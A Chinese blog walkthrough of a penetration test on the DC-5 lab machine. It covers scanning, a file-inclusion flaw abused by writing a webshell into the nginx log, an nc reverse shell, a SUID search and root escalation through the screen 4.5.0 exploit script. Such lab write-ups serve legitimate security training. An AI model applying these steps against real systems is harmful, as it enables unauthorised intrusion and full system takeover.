DC-5靶机渗透测试(文件包含漏洞)

最新推荐文章于 2022-12-01 11:33:04 发布
最新推荐文章于 2022-12-01 11:33:04 发布
阅读量8.9k 收藏 23
点赞数 5
分类专栏: DC靶机-渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/single_g_l/article/details/123761191
版权

目录

一、 环境

二、信息收集

1、主机发现&端口扫描

2、访问80端口

3、尝试提交留言,刷新页面,“Copyright © 2017”动态变化

 4、dirsearch 扫描敏感目录

五、渗透测试开始

1、调用file协议查看一下网站目录,发现能够成功读取目录储存文件

2、改包,写入一句话木马 

3、查看日志文件,木马写入成功。

4、蚁剑连接

5、nc 反弹shell

​6、进入交互模式

7、用find查看suid是否有可执行的文件

8、screen提权

01. 找到漏洞脚本,下载

02. 判断文件格式 

 03. 按脚本内提示步骤,进行提权

 04.将编辑好的dc5.sh上传到蚁剑,执行命令,获取root权限

9、获取root权限,拿到flag

一、 环境

靶机: 192.168.1.127

攻击机:192.168.1.209

二、信息收集

1、主机发现&端口扫描

nmap -sP 192.168.1.0/24  #发现存活主机
nmap -sS A 192.168.1.127  #开放端口

2、访问80端口

3、尝试提交留言,刷新页面,“Copyright © 2017”动态变化

刷新页面,“Copyright © 2017”动态变化

 4、dirsearch 扫描敏感目录

dirsearch -u "http://192.168.1.127:80"

爆破出网站子域名,进入web页面继续信息收集,观察获取shell的方式 

逐个尝试,发现footer.php文件出现动态变化,猜想是thankkyou.php调用footer.php,可能存在文件包含漏洞。

五、渗透测试开始

1、调用file协议查看一下网站目录,发现能够成功读取目录储存文件

查看你passwd文件发下并没什么可用的,没有发现可登录用户,换个方式。
nmap扫描服务器版本为nginx 1.6.2,服务器的日志存放在/var/log/nginx/error.log。file写入命令传输,发现都会被日志给记录下来。
那么我们可以尝试通过file传递写入反弹shell,监听靶机。

2、改包,写入一句话木马 

3、查看日志文件,木马写入成功。

4、蚁剑连接

5、nc 反弹shell

6、进入交互模式

python -c 'import pty;pty.spawn("/bin/bash")' ##获取交互式shell

7、用find查看suid是否有可执行的文件

#查看suid是否有可执行的文件
find / –perm /4000 –print 2>/dev/null
#找特殊执行权限的文件,将错误输出到/dev/null下,/dev/null相当于linux中无底的垃圾桶

#查看suid文件夹
find / -perm -u=s -type f 2>/dev/null

 screen-4.5.0存在漏洞

8、screen提权

01. 找到漏洞脚本,下载

searchsploit scree 4.5.0
searchsploit -m 41154.sh

02. 判断文件格式 

#判断文件是dos格式还是unix格式
#使用vim打开文件,输入:set ff?。根据返回结果可以文件类型
如果是dos格式,需要转化为unix格式
dos2unix 41154.sh

 03. 按脚本内提示步骤,进行提权

编译两个文件

vim libhax.c
gcc -fPIC -shared -ldl -o libhax.so libhax.c #单独保存并编译
vim rootshell.c
gcc -o rootshell rootshell.c
vim dc5.sh

 04.将编辑好的dc5.sh上传到蚁剑,执行命令,获取root权限

chmod +x dc5.sh
cd /tmp
./dc5.sh

9、获取root权限,拿到flag

小小丸子551
关注
  • 5
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC-5主机渗透
weixin_65920814的博客
05-25 196
本文详细介绍DC-5主机渗透测试的全部内容
hackthebox - haircut (考点: curl 运用 & screen 4.5.0提权)
冬萍子癸水
04-27 711
nmap 常规端口,22可能是ssh登录,80是进web搜集信息 C:\root> nmap -A 10.10.10.24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-26 22:32 EDT Nmap scan report for 10.10.10.24 Host is up (0.25s latency). Not shown:...
vulnhub之DC5靶机
LainWith的博客
08-15 562
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
10.100个渗透测试实战#10(DC-5)
qwsn
03-30 2672
世间一切即可努力 ...
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5906
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-5
per_se_veran_ce的博客
10-07 450
1、发现目标主机,信息收集 开放端口80,111,59888 2、访问80端口 尝试提交留言 刷新一次年份变化一次 http://192.168.168.203/thankyou.php?firstname=1&lastname=1&country=australia&subject=1 3、御剑扫描敏感目录 4、逐步去试,发现footer.php...
DC-5靶机渗透实战笔记
qq_43571759的博客
03-31 1320
DC-5渗透实战 做到DC-5才知道前面几个靶机还是蛮正常,这个靶机坑了我好多时间,希望这些时间花的值得… 前面的还是一如既往,同样还是nmap扫描主机,开放端口和系统版本 感觉这次的靶机有些许不同了,这里开放了两个端口,80和111,111是RPC服务的端口号 先进入网站看看 前面四个页面都是密密麻麻的英语的静态页面,是没有什么搞头的,最后一页才有这张可以输入的页面 随便提交了点东西,发现...
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4830
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
DC-5 靶机渗透
Rex_Surprise的博客
05-10 211
DC-5 靶机渗透 1.渗透过程 THEEND! DC-5 靶机渗透1.渗透过程 开始,扫描主机: netdiscover -r 192.168.0.1/24 找到一个 192.168.0.149 00:0c:29:cb:31:5f 1 60 VMware, Inc. 扫端口: nmap -sS -A -p- ...
Vulnhub 之 DC-5提权
ST0new的博客
07-23 681
文章目录前言作者描述复现环境开始复现查看flag 前言 本靶机只做学习使用,不要将其利用于非法途径。 终于来到了倒数第二关,这一关将难度增加,所以我们需要借助搜索工具来帮助我们完成 作者描述 DC-5是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。 这个计划是为了让DC-5更上一层楼,所以这对初学者来说可能不太好,但对有中级或更好经验的人来说应该没问题。时间会证明一切(反馈也会证明)...
dc-5靶机渗透笔记
现代鲁滨逊的博客
05-12 262
1.发现主机 192.168.14.153 2.开启nmap端口扫描,开放了80,111,37620端口 3.访问站点,啥也没有 4.扫描后台文件,还是啥也没有 5. 然后看别人的笔记就是,每刷新一次thankyou.php,页尾的年份就会更新,别人扫出了个footer.php,推断出thankyou.php会包含footer.php,然后就猜想有文件包含漏洞,至于传递的参数是file应该是爆破出来的。 6. 尝试读取/etc/passwd文件 7.想尝试远程文件包含,但是不知道
DC-5靶机渗透
m0_62008601的博客
05-21 623
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
DC系列(5)DC-5靶机渗透
Nikris的博客
01-12 975
DC-5
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
hyjcking的博客
12-01 1271
今天这台靶机涉及的知识点非常全面 1.有文件上传漏洞 2.基于cookie的sql注入漏洞 3.sqlmap的使用 4.用kali自带的木马生成工具weevely生成绕waf的一句话木马 5.使用绕waf的木马和普通gif结合生成gif图片木马, 6.使用knock敲开隐藏的服务器端口, 7.使用ltrace函数跟踪进程的库函数调用从而得到正确id, 8.用msfvenom生成一个针对性的shellcode然后对目标服务器端口进行缓冲区溢出攻击从而得到root权限
渗透DC-1靶机设计思路
最新发布
05-24
可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值